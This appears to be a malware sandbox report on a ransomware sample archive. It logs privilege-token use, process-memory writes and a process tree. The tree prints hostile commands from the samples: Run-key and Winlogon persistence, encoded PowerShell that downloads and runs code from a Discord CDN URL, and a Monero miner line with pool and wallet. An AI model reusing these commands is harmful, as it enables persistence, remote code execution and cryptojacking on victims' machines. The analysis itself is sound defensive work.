3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
920	7zFM.exe
3456	taskmgr.exe
5836	Setup.tmp

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	920	7zFM.exe
Token: 35	920	7zFM.exe
Token: SeSecurityPrivilege	920	7zFM.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	2456	taskmgr.exe
Token: SeSystemProfilePrivilege	2456	taskmgr.exe
Token: SeCreateGlobalPrivilege	2456	taskmgr.exe
Token: SeDebugPrivilege	3456	taskmgr.exe
Token: SeSystemProfilePrivilege	3456	taskmgr.exe
Token: SeCreateGlobalPrivilege	3456	taskmgr.exe
Token: 33	2456	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2456	taskmgr.exe
Token: SeDebugPrivilege	3836	HEUR-Trojan-Ransom.MSIL.Blocker.gen-23b8ae84b0edc8f3e97582280a2cc11010f3f8dbc3a9bb79f393cb89566c239d.exe
Token: SeDebugPrivilege	3916	HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
Token: SeDebugPrivilege	2256	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
Token: SeDebugPrivilege	3464	HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
Token: SeDebugPrivilege	3044	HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
Token: SeDebugPrivilege	3880	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	5376	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	6016	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeIncreaseQuotaPrivilege	4448	powershell.exe
Token: SeSecurityPrivilege	4448	powershell.exe
Token: SeTakeOwnershipPrivilege	4448	powershell.exe
Token: SeLoadDriverPrivilege	4448	powershell.exe
Token: SeSystemProfilePrivilege	4448	powershell.exe
Token: SeSystemtimePrivilege	4448	powershell.exe
Token: SeProfSingleProcessPrivilege	4448	powershell.exe
Token: SeIncBasePriorityPrivilege	4448	powershell.exe
Token: SeCreatePagefilePrivilege	4448	powershell.exe
Token: SeBackupPrivilege	4448	powershell.exe
Token: SeRestorePrivilege	4448	powershell.exe
Token: SeShutdownPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeSystemEnvironmentPrivilege	4448	powershell.exe
Token: SeRemoteShutdownPrivilege	4448	powershell.exe
Token: SeUndockPrivilege	4448	powershell.exe
Token: SeManageVolumePrivilege	4448	powershell.exe
Token: 33	4448	powershell.exe
Token: 34	4448	powershell.exe
Token: 35	4448	powershell.exe
Token: 36	4448	powershell.exe
Token: SeBackupPrivilege	5628	vssvc.exe
Token: SeRestorePrivilege	5628	vssvc.exe
Token: SeAuditPrivilege	5628	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4868	powershell.exe
Token: SeSecurityPrivilege	4868	powershell.exe
Token: SeTakeOwnershipPrivilege	4868	powershell.exe
Token: SeLoadDriverPrivilege	4868	powershell.exe
Token: SeSystemProfilePrivilege	4868	powershell.exe
Token: SeSystemtimePrivilege	4868	powershell.exe
Token: SeProfSingleProcessPrivilege	4868	powershell.exe
Token: SeIncBasePriorityPrivilege	4868	powershell.exe
Token: SeCreatePagefilePrivilege	4868	powershell.exe
Token: SeBackupPrivilege	4868	powershell.exe
Token: SeRestorePrivilege	4868	powershell.exe
Token: SeShutdownPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeSystemEnvironmentPrivilege	4868	powershell.exe
Token: SeRemoteShutdownPrivilege	4868	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
920	7zFM.exe
920	7zFM.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4528	OpenWith.exe
2344	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
2344	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2456 wrote to memory of 3456	2456	taskmgr.exe	98
PID 2456 wrote to memory of 3456	2456	taskmgr.exe	98
PID 1196 wrote to memory of 684	1196	powershell.exe	100
PID 1196 wrote to memory of 684	1196	powershell.exe	100
PID 684 wrote to memory of 3916	684	cmd.exe	101
PID 684 wrote to memory of 3916	684	cmd.exe	101
PID 684 wrote to memory of 3916	684	cmd.exe	101
PID 684 wrote to memory of 3836	684	cmd.exe	102
PID 684 wrote to memory of 3836	684	cmd.exe	102
PID 684 wrote to memory of 2256	684	cmd.exe	104
PID 684 wrote to memory of 2256	684	cmd.exe	104
PID 684 wrote to memory of 2256	684	cmd.exe	104
PID 684 wrote to memory of 3896	684	cmd.exe	105
PID 684 wrote to memory of 3896	684	cmd.exe	105
PID 684 wrote to memory of 4480	684	cmd.exe	106
PID 684 wrote to memory of 4480	684	cmd.exe	106
PID 684 wrote to memory of 4480	684	cmd.exe	106
PID 684 wrote to memory of 3044	684	cmd.exe	107
PID 684 wrote to memory of 3044	684	cmd.exe	107
PID 684 wrote to memory of 2344	684	cmd.exe	108
PID 684 wrote to memory of 2344	684	cmd.exe	108
PID 684 wrote to memory of 2344	684	cmd.exe	108
PID 684 wrote to memory of 3464	684	cmd.exe	109
PID 684 wrote to memory of 3464	684	cmd.exe	109
PID 684 wrote to memory of 3464	684	cmd.exe	109
PID 684 wrote to memory of 536	684	cmd.exe	110
PID 684 wrote to memory of 536	684	cmd.exe	110
PID 4480 wrote to memory of 1644	4480	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe	111
PID 4480 wrote to memory of 1644	4480	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe	111
PID 4480 wrote to memory of 1644	4480	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe	111
PID 3896 wrote to memory of 3880	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	112
PID 3896 wrote to memory of 3880	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	112
PID 3896 wrote to memory of 4448	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	113
PID 3896 wrote to memory of 4448	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	113
PID 3896 wrote to memory of 4040	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	114
PID 3896 wrote to memory of 4040	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	114
PID 3896 wrote to memory of 4868	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	116
PID 3896 wrote to memory of 4868	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	116
PID 3896 wrote to memory of 2832	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	120
PID 3896 wrote to memory of 2832	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	120
PID 3896 wrote to memory of 5376	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	123
PID 3896 wrote to memory of 5376	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	123
PID 3896 wrote to memory of 6016	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	125
PID 3896 wrote to memory of 6016	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	125
PID 3896 wrote to memory of 4072	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	127
PID 3896 wrote to memory of 4072	3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe	127
PID 684 wrote to memory of 5016	684	cmd.exe	128
PID 684 wrote to memory of 5016	684	cmd.exe	128
PID 684 wrote to memory of 5016	684	cmd.exe	128
PID 1644 wrote to memory of 4792	1644	WScript.exe	130
PID 1644 wrote to memory of 4792	1644	WScript.exe	130
PID 1644 wrote to memory of 4792	1644	WScript.exe	130
PID 1644 wrote to memory of 4164	1644	WScript.exe	131
PID 1644 wrote to memory of 4164	1644	WScript.exe	131
PID 4792 wrote to memory of 5836	4792	Setup.exe	132
PID 4792 wrote to memory of 5836	4792	Setup.exe	132
PID 4792 wrote to memory of 5836	4792	Setup.exe	132
PID 536 wrote to memory of 5940	536	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe	133
PID 536 wrote to memory of 5940	536	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe	133
PID 684 wrote to memory of 5324	684	cmd.exe	134
PID 684 wrote to memory of 5324	684	cmd.exe	134
PID 684 wrote to memory of 5324	684	cmd.exe	134
PID 4164 wrote to memory of 5960	4164	smss.exe	135
PID 4164 wrote to memory of 5960	4164	smss.exe	135

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
8392	attrib.exe
10268	attrib.exe
10452	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00467.7z
1⤵
- Modifies registry class
PID:2380

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4528

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2720

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00467.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:684
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "exploreresi" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\exploreresi.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6276
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "exploreresi" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\exploreresi.exe"
        5⤵
        
        PID:6732
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-23b8ae84b0edc8f3e97582280a2cc11010f3f8dbc3a9bb79f393cb89566c239d.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-23b8ae84b0edc8f3e97582280a2cc11010f3f8dbc3a9bb79f393cb89566c239d.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3836
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
      4⤵
      PID:7440
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
        5⤵
        
        PID:7692
  - - C:\Users\Admin\AppData\Roaming\MAINPROC.exe
      "C:\Users\Admin\AppData\Roaming\MAINPROC.exe"
      4⤵
      PID:11044
    - - C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
        5⤵
        
        PID:6832
    - - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\Temp\SMSS.exe"
        5⤵
        
        PID:11516
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMgAzADcANwA1ADUANQA3ADIAOQAwADYAMwA5ADgANwAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
      4⤵
      PID:536
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4480
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00467\hgfjgbnvbnfyvhjfcghbnftydeghdfhf.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1644
    - - C:\Users\Admin\Desktop\00467\Setup.exe
        
        "C:\Users\Admin\Desktop\00467\Setup.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4792
      - C:\Users\Admin\AppData\Local\Temp\is-GTKFH.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GTKFH.tmp\Setup.tmp" /SL5="$40446,6160288,227840,C:\Users\Admin\Desktop\00467\Setup.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:5836
    - - C:\Users\Admin\Desktop\00467\smss.exe
        
        "C:\Users\Admin\Desktop\00467\smss.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:5960
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:2360
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:2720
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:1536
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:2872
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:3452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:596
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:1952
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
        6⤵
        
        PID:10296
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3044
  - - C:\Users\Admin\AppData\Local\Temp\rundll32.exe
      "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
      4⤵
      Executes dropped EXE
      PID:6708
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45R4Kg7FJmq8ExsZZwNgca2YdATVRcza4bCwpzf9dGdabt5om6SYLuVfnwFRVyj8dx9paSBaN9PXkELkJQNs3WvGMZ9NqUs --pass=csgocheat --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=4 --unam-idle-cpu=100 --tls --unam-stealth
        5⤵
        
        PID:7280
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
    HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2344
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
    HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3464
- - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
    HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
      HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5940
